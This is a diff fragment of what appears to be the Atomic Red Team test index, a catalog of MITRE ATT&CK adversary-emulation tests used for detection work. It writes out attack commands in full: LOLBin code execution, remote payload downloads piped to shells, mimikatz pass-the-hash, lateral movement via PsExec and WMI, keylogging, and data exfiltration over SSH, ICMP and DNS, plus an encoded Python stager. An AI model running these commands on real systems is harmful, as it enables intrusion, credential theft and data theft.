command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0)
'
'
- name: Rundll32 advpack.dll Execution
description: |
Test execution of a command using rundll32.exe with advpack.dll.
@@ -23953,7 +23953,7 @@ execution:
elevation_required: false
command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
'
'
- name: Rundll32 ieadvpack.dll Execution
description: |
Test execution of a command using rundll32.exe with ieadvpack.dll.
@@ -23978,7 +23978,7 @@ execution:
elevation_required: false
command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,
'
'
- name: Rundll32 syssetup.dll Execution
description: |
Test execution of a command using rundll32.exe with syssetup.dll.
@@ -24004,7 +24004,7 @@ execution:
command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall
128 .\#{inf_to_execute}
'
'
- name: Rundll32 setupapi.dll Execution
description: |
Test execution of a command using rundll32.exe with setupapi.dll.
@@ -24030,7 +24030,7 @@ execution:
command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128
.\#{inf_to_execute}
'
'
T1053:
technique:
x_mitre_permissions_required:
@@ -24133,7 +24133,7 @@ execution:
elevation_required: false
command: 'at 13:20 /interactive cmd
'
'
- name: Scheduled task Local
description: ''
supported_platforms:
@@ -24152,14 +24152,14 @@ execution:
elevation_required: true
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
'
'
cleanup_command: 'SCHTASKS /Delete /TN spawn /F
'
'
- name: Scheduled task Remote
description: 'Create a task on a remote system
'
'
supported_platforms:
- windows
input_arguments:
@@ -24189,10 +24189,10 @@ execution:
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
'
'
cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F
'
'
- name: Powershell Cmdlet Scheduled Task
description: |
Create an atomic scheduled task that leverages native powershell cmdlets.
@@ -24212,7 +24212,7 @@ execution:
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
'
'
T1064:
technique:
x_mitre_permissions_required:
@@ -24281,7 +24281,7 @@ execution:
- name: Create and Execute Bash Shell Script
description: 'Creates and executes a simple bash script.
'
'
supported_platforms:
- macos
- linux
@@ -24296,7 +24296,7 @@ execution:
- name: Create and Execute Batch Script
description: 'Creates and executes a simple batch script.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24316,7 +24316,7 @@ execution:
\n"
cleanup_command: 'del #{script_to_create} >nul 2>&1
'
'
T1035:
technique:
x_mitre_data_sources:
@@ -24364,7 +24364,7 @@ execution:
it. When executing commands such as PowerShell, the service will report that
it did not start correctly even when code executes properly.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24413,7 +24413,7 @@ execution:
elevation_required: false
command: '#{psexec_exe} \\#{remote_host} "C:\Windows\System32\calc.exe"
'
'
T1218:
technique:
x_mitre_data_sources:
@@ -24527,7 +24527,7 @@ execution:
description: 'Injects arbitrary DLL into running process specified by process
ID. Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24551,12 +24551,12 @@ execution:
elevation_required: true
command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
'
'
- name: SyncAppvPublishingServer - Execute arbitrary PowerShell code
description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
Requires Windows 10.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24568,12 +24568,12 @@ execution:
name: command_prompt
command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}"
'
'
- name: Register-CimProvider - Execute evil dll
description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also
note this dll can be served up via SMB
'
'
supported_platforms:
- windows
input_arguments:
@@ -24592,11 +24592,11 @@ execution:
name: command_prompt
command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
'
'
- name: Msiexec.exe - Execute Local MSI file
description: 'Execute arbitrary MSI file. Commonly seen in application installation.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24613,12 +24613,12 @@ execution:
name: command_prompt
command: 'msiexec.exe /q /i "#{msi_payload}"
'
'
- name: Msiexec.exe - Execute Remote MSI file
description: 'Execute arbitrary MSI file retrieved remotely. Less commonly seen
in application installation, commonly seen in malware execution.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24630,12 +24630,12 @@ execution:
name: command_prompt
command: 'msiexec.exe /q /i "#{msi_payload}"
'
'
- name: Msiexec.exe - Execute Arbitrary DLL
description: 'Execute arbitrary DLL file stored locally. Commonly seen in application
installation.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24654,11 +24654,11 @@ execution:
name: command_prompt
command: 'msiexec.exe /y "#{dll_payload}"
'
'
- name: Odbcconf.exe - Execute Arbitrary DLL
description: 'Execute arbitrary DLL file stored locally.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24677,7 +24677,7 @@ execution:
name: command_prompt
command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
'
'
- name: InfDefaultInstall.exe .inf Execution
description: |
Test execution of a .inf using InfDefaultInstall.exe
@@ -24702,7 +24702,7 @@ execution:
elevation_required: false
command: 'InfDefaultInstall.exe #{inf_to_execute}
'
'
T1216:
technique:
x_mitre_data_sources:
@@ -24759,7 +24759,7 @@ execution:
description: 'Executes the signed PubPrn.vbs script with options to download
and execute an arbitrary payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24773,12 +24773,12 @@ execution:
command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
localhost "script:#{remote_payload}"
'
'
- name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
description: 'Executes the signed SyncAppvPublishingServer script with options
to execute an arbitrary PowerShell command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24791,12 +24791,12 @@ execution:
elevation_required: false
command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
'
'
- name: manage-bde.wsf Signed Script Command Execution
description: 'Executes the signed manage-bde.wsf script with options to execute
an arbitrary command.
'
'
supported_platforms:
- windows
input_arguments:
@@ -24812,7 +24812,7 @@ execution:
cscript manage-bde.wsf
cleanup_command: 'set comspec=C:\Windows\System32\cmd.exe
'
'
T1153:
technique:
x_mitre_data_sources:
@@ -24857,7 +24857,7 @@ execution:
- name: Execute Script using Source
description: 'Creates a script and executes it using the source command
'
'
supported_platforms:
- macos
- linux
@@ -24871,7 +24871,7 @@ execution:
description: 'Creates a script and executes it using the source command''s dot
alias
'
'
supported_platforms:
- macos
- linux
@@ -24941,7 +24941,7 @@ execution:
- name: Space After Filename
description: 'Space After Filename
'
'
supported_platforms:
- macos
executor:
@@ -25148,7 +25148,7 @@ execution:
- name: MSBuild Bypass Using Inline Tasks
description: 'Executes the code in a project file using. C# Example
'
'
supported_platforms:
- windows
input_arguments:
@@ -25168,7 +25168,7 @@ execution:
elevation_required: false
command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
'
'
T1204:
technique:
x_mitre_data_sources:
@@ -25258,7 +25258,7 @@ execution:
jse_path:
description: 'Path for the macro to write out the "malicious" .jse file
'
'
type: String
default: C:\Users\Public\art.jse
dependency_executor_name: powershell
@@ -25314,7 +25314,7 @@ execution:
cleanup_command: 'Remove-ItemProperty -Path ''HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\''
-Name ''AccessVBOM'' -ErrorAction Ignore
'
'
- name: OSTAP JS version
description: "Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
\nExecution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
@@ -25417,7 +25417,7 @@ execution:
- name: WMI Reconnaissance Users
description: 'WMI List User Accounts
'
'
supported_platforms:
- windows
executor:
@@ -25425,11 +25425,11 @@ execution:
elevation_required: false
command: 'wmic useraccount get /ALL
'
'
- name: WMI Reconnaissance Processes
description: 'WMI List Processes
'
'
supported_platforms:
- windows
executor:
@@ -25437,11 +25437,11 @@ execution:
elevation_required: false
command: 'wmic process get caption,executablepath,commandline
'
'
- name: WMI Reconnaissance Software
description: 'WMI List Software
'
'
supported_platforms:
- windows
executor:
@@ -25449,11 +25449,11 @@ execution:
elevation_required: false
command: 'wmic qfe get description,installedOn /format:csv
'
'
- name: WMI Reconnaissance List Remote Services
description: 'WMI List Remote Services
'
'
supported_platforms:
- windows
input_arguments:
@@ -25471,11 +25471,11 @@ execution:
command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}
(%")
'
'
- name: WMI Execute Local Process
description: 'This test uses wmic.exe to execute a process on the local host.
'
'
supported_platforms:
- windows
input_arguments:
@@ -25488,11 +25488,11 @@ execution:
elevation_required: false
command: 'wmic process call create #{process_to_execute}
'
'
- name: WMI Execute Remote Process
description: 'This test uses wmic.exe to execute a process on a remote host.
'
'
supported_platforms:
- windows
input_arguments:
@@ -25509,7 +25509,7 @@ execution:
elevation_required: false
command: 'wmic /node:"#{node}" process call create #{process_to_execute}
'
'
T1028:
technique:
x_mitre_data_sources:
@@ -25574,7 +25574,7 @@ execution:
- name: Enable Windows Remote Management
description: 'Powershell Enable WinRM
'
'
supported_platforms:
- windows
executor:
@@ -25582,7 +25582,7 @@ execution:
elevation_required: true
command: 'Enable-PSRemoting -Force
'
'
- name: PowerShell Lateral Movement
description: |
Powershell lateral movement using the mmc20 application com object
@@ -25602,11 +25602,11 @@ execution:
command: 'powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
$null, $null, "7")
'
'
- name: WMIC Process Call Create
description: 'Utilize WMIC to start remote process
'
'
supported_platforms:
- windows
input_arguments:
@@ -25629,11 +25629,11 @@ execution:
NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\"
/t REG_SZ /d \"cmd.exe\" /f"
'
'
- name: Psexec
description: 'Utilize psexec to start remote process
'
'
supported_platforms:
- windows
input_arguments:
@@ -25653,11 +25653,11 @@ execution:
name: command_prompt
command: 'psexec \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe
'
'
- name: Invoke-Command
description: 'Execute Invoke-command on remote host
'
'
supported_platforms:
- windows
input_arguments:
@@ -25673,7 +25673,7 @@ execution:
name: powershell
command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
'
'
T1220:
technique:
x_mitre_data_sources:
@@ -25769,7 +25769,7 @@ execution:
transformation using a local payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
'
supported_platforms:
- windows
input_arguments:
@@ -25797,13 +25797,13 @@ execution:
name: command_prompt
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
'
- name: MSXSL Bypass using remote files
description: 'Executes the code specified within a XSL script tag during XSL
transformation using a remote payload. Requires download of MSXSL from Microsoft
at https://www.microsoft.com/en-us/download/details.aspx?id=21714.
'
'
supported_platforms:
- windows
input_arguments:
@@ -25819,12 +25819,12 @@ execution:
name: command_prompt
command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
'
'
- name: WMIC bypass using local XSL file
description: 'Executes the code specified within a XSL script using a local
payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -25847,12 +25847,12 @@ execution:
name: command_prompt
command: 'wmic.exe #{wmic_command} /FORMAT:#{local_xsl_file}
'
'
- name: WMIC bypass using remote XSL file
description: 'Executes the code specified within a XSL script using a remote
payload.
'
'
supported_platforms:
- windows
input_arguments:
@@ -25868,7 +25868,7 @@ execution:
name: command_prompt
command: 'wmic.exe #{wmic_command} /FORMAT:#{remote_xsl_file}
'
'
lateral-movement:
T1155:
technique:
@@ -25938,7 +25938,7 @@ lateral-movement:
command: 'osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK''));\"
| python &""
'
'
'':
technique:
x_mitre_data_sources:
@@ -26055,7 +26055,7 @@ lateral-movement:
description: 'Adds a registry value to run batch script created in the C:\Windows\Temp
directory.
'
'
supported_platforms:
- windows
input_arguments:
@@ -26080,7 +26080,7 @@ lateral-movement:
- name: Scheduled Task Startup Script
description: 'Run an exe on user logon or system startup
'
'
supported_platforms:
- windows
executor:
@@ -26095,7 +26095,7 @@ lateral-movement:
- name: Logon Scripts - Mac
description: 'Mac logon script
'
'
supported_platforms:
- macos
executor:
@@ -26111,7 +26111,7 @@ lateral-movement:
description: 'vbs files can be placed in and ran from the startup folder to
maintain persistance
'
'
supported_platforms:
- windows
executor:
@@ -26129,7 +26129,7 @@ lateral-movement:
description: 'jse files can be placed in and ran from the startup folder to
maintain persistance
'
'
supported_platforms:
- windows
executor:
@@ -26147,7 +26147,7 @@ lateral-movement:
description: 'bat files can be placed in and ran from the startup folder to
maintain persistance
'
'
supported_platforms:
- windows
executor:
@@ -26234,11 +26234,11 @@ lateral-movement:
name: command_prompt
command: 'mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
'
'
- name: crackmapexec Pass the Hash
description: 'command execute with crackmapexec
'
'
supported_platforms:
- windows
input_arguments:
@@ -26338,7 +26338,7 @@ lateral-movement:
- name: Mimikatz Kerberos Ticket Attack
description: 'Similar to PTH, but attacking Kerberos
'
'
supported_platforms:
- windows
input_arguments:
@@ -26354,7 +26354,7 @@ lateral-movement:
name: command_prompt
command: 'mimikatz # kerberos::ptt #{user_name}@#{domain}
'
'
T1076:
technique:
x_mitre_permissions_required:
@@ -26427,7 +26427,7 @@ lateral-movement:
- how to hijack RDS and RemoteApp sessions transparently to move through an
organization
'
'
supported_platforms:
- windows
executor:
@@ -26439,12 +26439,12 @@ lateral-movement:
net start sesshijack
cleanup_command: 'sc.exe delete sesshijack
'
'
- name: RDPto-DomainController
description: 'Attempt an RDP session via "Connect-RDP" to a system. Default
RDPs to (%logonserver%) as the current user
'
'
supported_platforms:
- windows
input_arguments:
@@ -26467,7 +26467,7 @@ lateral-movement:
elevation_required: false
command: 'Connect-RDP -ComputerName #{logonserver} -User #{username}
'
'
T1105:
technique:
x_mitre_data_sources:
@@ -26519,7 +26519,7 @@ lateral-movement:
- name: rsync remote file copy (push)
description: 'Utilize rsync to perform a remote file copy (push)
'
'
supported_platforms:
- linux
- macos
@@ -26544,11 +26544,11 @@ lateral-movement:
name: bash
command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
'
'
- name: rsync remote file copy (pull)
description: 'Utilize rsync to perform a remote file copy (pull)
'
'
supported_platforms:
- linux
- macos
@@ -26573,11 +26573,11 @@ lateral-movement:
name: bash
command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
'
'
- name: scp remote file copy (push)
description: 'Utilize scp to perform a remote file copy (push)
'
'
supported_platforms:
- linux
- macos
@@ -26602,11 +26602,11 @@ lateral-movement:
name: bash
command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
'
'
- name: scp remote file copy (pull)
description: 'Utilize scp to perform a remote file copy (pull)
'
'
supported_platforms:
- linux
- macos
@@ -26631,11 +26631,11 @@ lateral-movement:
name: bash
command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
'
'
- name: sftp remote file copy (push)
description: 'Utilize sftp to perform a remote file copy (push)
'
'
supported_platforms:
- linux
- macos
@@ -26660,11 +26660,11 @@ lateral-movement:
name: bash
command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
'
'
- name: sftp remote file copy (pull)
description: 'Utilize sftp to perform a remote file copy (pull)
'
'
supported_platforms:
- linux
- macos
@@ -26689,12 +26689,12 @@ lateral-movement:
name: bash
command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
'
'
- name: certutil download (urlcache)
description: 'Use certutil -urlcache argument to download a file from the web.
Note - /urlcache also works!
'
'
supported_platforms:
- windows
input_arguments:
@@ -26711,12 +26711,12 @@ lateral-movement:
elevation_required: false
command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
'
'
- name: certutil download (verifyctl)
description: 'Use certutil -verifyctl argument to download a file from the web.
Note - /verifyctl also works!
'
'
supported_platforms:
- windows
input_arguments:
@@ -26761,7 +26761,7 @@ lateral-movement:
command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority
HIGH #{remote_file} #{local_path}
'
'
- name: Windows - PowerShell Download
description: |
This test uses PowerShell to download a payload.
@@ -26782,15 +26782,15 @@ lateral-movement:
command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}",
"#{destination_path}")
'
'
cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
'
'
- name: OSTAP Worming Activity
description: 'OSTap copies itself in a specfic way to shares and secondary drives.
This emulates the activity.
'
'
supported_platforms:
- windows
input_arguments:
@@ -26906,7 +26906,7 @@ lateral-movement:
- name: Map admin share
description: 'Connecting To Remote Shares
'
'
supported_platforms:
- windows
input_arguments:
@@ -26932,11 +26932,11 @@ lateral-movement:
command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password}
/u:#{user_name}"
'
'
- name: Map Admin Share PowerShell
description: 'Map Admin share utilizing PowerShell
'
'
supported_platforms:
- windows
input_arguments:
@@ -26957,12 +26957,12 @@ lateral-movement:
elevation_required: false
command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
'
'
- name: Copy and Execute File with PsExec
description: 'Copies a file to a remote host and executes it using PsExec. Requires
the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
'
'
supported_platforms:
- windows
input_arguments:
@@ -26979,7 +26979,7 @@ lateral-movement:
elevation_required: true
command: 'psexec.exe #{remote_host} -c #{command_path}
'
'
- name: Execute command writing output to local Admin Share
description: |
Executes a command, writing the output to a local Admin Share.
@@ -27001,7 +27001,7 @@ lateral-movement:
command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file}
2>&1
'
'
T1028:
technique:
x_mitre_data_sources:
@@ -27066,7 +27066,7 @@ lateral-movement:
- name: Enable Windows Remote Management
description: 'Powershell Enable WinRM
'
'
supported_platforms:
- windows
executor:
@@ -27074,7 +27074,7 @@ lateral-movement:
elevation_required: true
command: 'Enable-PSRemoting -Force
'
'
- name: PowerShell Lateral Movement
description: |
Powershell lateral movement using the mmc20 application com object
@@ -27094,11 +27094,11 @@ lateral-movement:
command: 'powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
$null, $null, "7")
'
'
- name: WMIC Process Call Create
description: 'Utilize WMIC to start remote process
'
'
supported_platforms:
- windows
input_arguments:
@@ -27121,11 +27121,11 @@ lateral-movement:
NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\"
/t REG_SZ /d \"cmd.exe\" /f"
'
'
- name: Psexec
description: 'Utilize psexec to start remote process
'
'
supported_platforms:
- windows
input_arguments:
@@ -27145,11 +27145,11 @@ lateral-movement:
name: command_prompt
command: 'psexec \\#{computer_name} -u #{user_name} -p #{password} -s cmd.exe
'
'
- name: Invoke-Command
description: 'Execute Invoke-command on remote host
'
'
supported_platforms:
- windows
input_arguments:
@@ -27165,7 +27165,7 @@ lateral-movement:
name: powershell
command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
'
'
collection:
T1123:
technique:
@@ -27217,7 +27217,7 @@ collection:
elevation_required: false
command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
'
'
T1119:
technique:
x_mitre_permissions_required:
@@ -27274,7 +27274,7 @@ collection:
- name: Automated Collection Command Prompt
description: 'Automated Collection
'
'
supported_platforms:
- windows
executor:
@@ -27285,7 +27285,7 @@ collection:
- name: Automated Collection PowerShell
description: 'Automated Collection
'
'
supported_platforms:
- windows
executor:
@@ -27294,11 +27294,11 @@ collection:
command: 'Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName
-destination c:\temp}
'
'
- name: Recon information for export with PowerShell
description: 'collect information for exfiltration
'
'
supported_platforms:
- windows
executor:
@@ -27315,7 +27315,7 @@ collection:
- name: Recon information for export with Command Prompt
description: 'collect information for exfiltration
'
'
supported_platforms:
- windows
executor:
@@ -27379,7 +27379,7 @@ collection:
- name: Utilize Clipboard to store or execute commands from
description: 'Add data to clipboard to copy off or execute commands from.
'
'
supported_platforms:
- windows
executor:
@@ -27391,12 +27391,12 @@ collection:
clip < %temp%\T1115.txt
cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
'
'
- name: PowerShell
description: 'Utilize PowerShell to echo a command to clipboard and execute
it
'
'
supported_platforms:
- windows
executor:
@@ -27451,7 +27451,7 @@ collection:
description: 'Utilize powershell to download discovery.bat and save to a local
file
'
'
supported_platforms:
- windows
executor:
@@ -27460,12 +27460,12 @@ collection:
command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat'')
> pi.log
'
'
- name: Stage data from Discovery.sh
description: 'Utilize curl to download discovery.sh and execute a basic information
gathering shell script
'
'
supported_platforms:
- linux
- macos
@@ -27474,12 +27474,12 @@ collection:
command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh
| bash -s > /tmp/discovery.log
'
'
- name: Zip a Folder with PowerShell for Staging in Temp
description: 'Use living off the land tools to zip a file and stage it in the
Windows temporary folder for later exfiltration.
'
'
supported_platforms:
- windows
executor:
@@ -27488,11 +27488,11 @@ collection:
command: 'Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip
-DestinationPath $env:TEMP\Folder_to_zip.zip
'
'
cleanup_command: 'Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction
Ignore
'
'
'':
technique:
x_mitre_permissions_required:
@@ -27588,7 +27588,7 @@ collection:
description: 'This test uses `grep` to search a macOS Safari binaryCookies file
for specified values. This was used by CookieMiner malware.
'
'
supported_platforms:
- macos
input_arguments:
@@ -27689,7 +27689,7 @@ collection:
description: 'Search through local Outlook installation, extract mail, compress
the contents, and saves everything to a directory for later exfiltration.
'
'
supported_platforms:
- windows
input_arguments:
@@ -27703,10 +27703,10 @@ collection:
command: 'powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1
-file #{output_file}
'
'
cleanup_command: 'del #{output_file} >nul 2>&1
'
'
T1056:
technique:
x_mitre_data_sources:
@@ -27790,7 +27790,7 @@ collection:
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
'
'
T1113:
technique:
x_mitre_data_sources:
@@ -27846,7 +27846,7 @@ collection:
- name: Screencapture
description: 'Use screencapture command to collect a full desktop screenshot
'
'
supported_platforms:
- macos
input_arguments:
@@ -27861,7 +27861,7 @@ collection:
- name: Screencapture (silent)
description: 'Use screencapture command to collect a full desktop screenshot
'
'
supported_platforms:
- macos
input_arguments:
@@ -27877,7 +27877,7 @@ collection:
description: 'Use xwd command to collect a full desktop screenshot and review
file with xwud
'
'
supported_platforms:
- linux
input_arguments:
@@ -27893,7 +27893,7 @@ collection:
- name: Import
description: 'Use import command to collect a full desktop screenshot
'
'
supported_platforms:
- linux
input_arguments:
@@ -28020,10 +28020,10 @@ exfiltration:
elevation_required: false
command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
'
'
cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore
'
'
- name: Compress Data for Exfiltration With Rar
description: "An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration \n"
@@ -28063,15 +28063,15 @@ exfiltration:
elevation_required: false
command: '"#{rar_exe}" a -r #{output_file} #{input_path} *#{file_extension}
'
'
cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
'
'
- name: Data Compressed - nix - zip
description: 'An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration. This test uses standard zip compression.
'
'
supported_platforms:
- linux
- macos
@@ -28095,18 +28095,18 @@ exfiltration:
elevation_required: false
prereq_command: 'ls #{input_files} > /dev/null
'
'
command: 'zip #{output_file} #{input_files}
'
'
cleanup_command: 'rm -f #{output_file}
'
'
- name: Data Compressed - nix - gzip Single File
description: 'An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration. This test uses standard gzip compression.
'
'
supported_platforms:
- linux
- macos
@@ -28126,15 +28126,15 @@ exfiltration:
command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}''
>> #{input_file}; gzip -k #{input_file})
'
'
cleanup_command: 'rm -f #{input_file}.gz
'
'
- name: Data Compressed - nix - tar Folder or File
description: 'An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration. This test uses standard gzip compression.
'
'
supported_platforms:
- linux
- macos
@@ -28157,10 +28157,10 @@ exfiltration:
elevation_required: false
command: 'tar -cvzf #{output_file} #{input_file_folder}
'
'
cleanup_command: 'rm -f #{output_file}
'
'
T1022:
technique:
x_mitre_data_sources:
@@ -28219,7 +28219,7 @@ exfiltration:
- name: Data Encrypted with zip and gpg symmetric
description: 'Encrypt data for exiltration
'
'
supported_platforms:
- macos
- linux
@@ -28239,7 +28239,7 @@ exfiltration:
ls -l
cleanup_command: 'rm -Rf /tmp/victim-files
'
'
- name: Compress Data and lock with password for Exfiltration with winrar
description: |
Note: Requires winrar installation
@@ -28296,7 +28296,7 @@ exfiltration:
- name: Compress Data and lock with password for Exfiltration with 7zip
description: 'Note: Requires 7zip installation
'
'
supported_platforms:
- windows
executor:
@@ -28357,7 +28357,7 @@ exfiltration:
- name: Data Transfer Size Limits
description: 'Take a file/directory, split it into 5Mb chunks
'
'
supported_platforms:
- macos
- linux
@@ -28454,7 +28454,7 @@ exfiltration:
elevation_required: false
command: 'ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
'
'
- name: Exfiltration Over Alternative Protocol - SSH
description: |
Input a domain and test Exfiltration over SSH
@@ -28482,12 +28482,12 @@ exfiltration:
command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh
#{user_name}@#{domain} ''cat > /Users.tar.gz.enc''
'
'
- name: Exfiltration Over Alternative Protocol - HTTP
description: 'A firewall rule (iptables or firewalld) will be needed to allow
exfiltration on port 1337.
'
'
supported_platforms:
- macos
- linux
@@ -28510,7 +28510,7 @@ exfiltration:
- name: Exfiltration Over Alternative Protocol - ICMP
description: 'Exfiltration of specified file over ICMP protocol.
'
'
supported_platforms:
- windows
input_arguments:
@@ -28529,11 +28529,11 @@ exfiltration:
in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}",
1500, $Data) }
'
'
- name: Exfiltration Over Alternative Protocol - DNS
description: 'Exfiltration of specified file over DNS protocol.
'
'
supported_platforms:
- linux
input_arguments:
@@ -28692,7 +28692,7 @@ command-and-control:
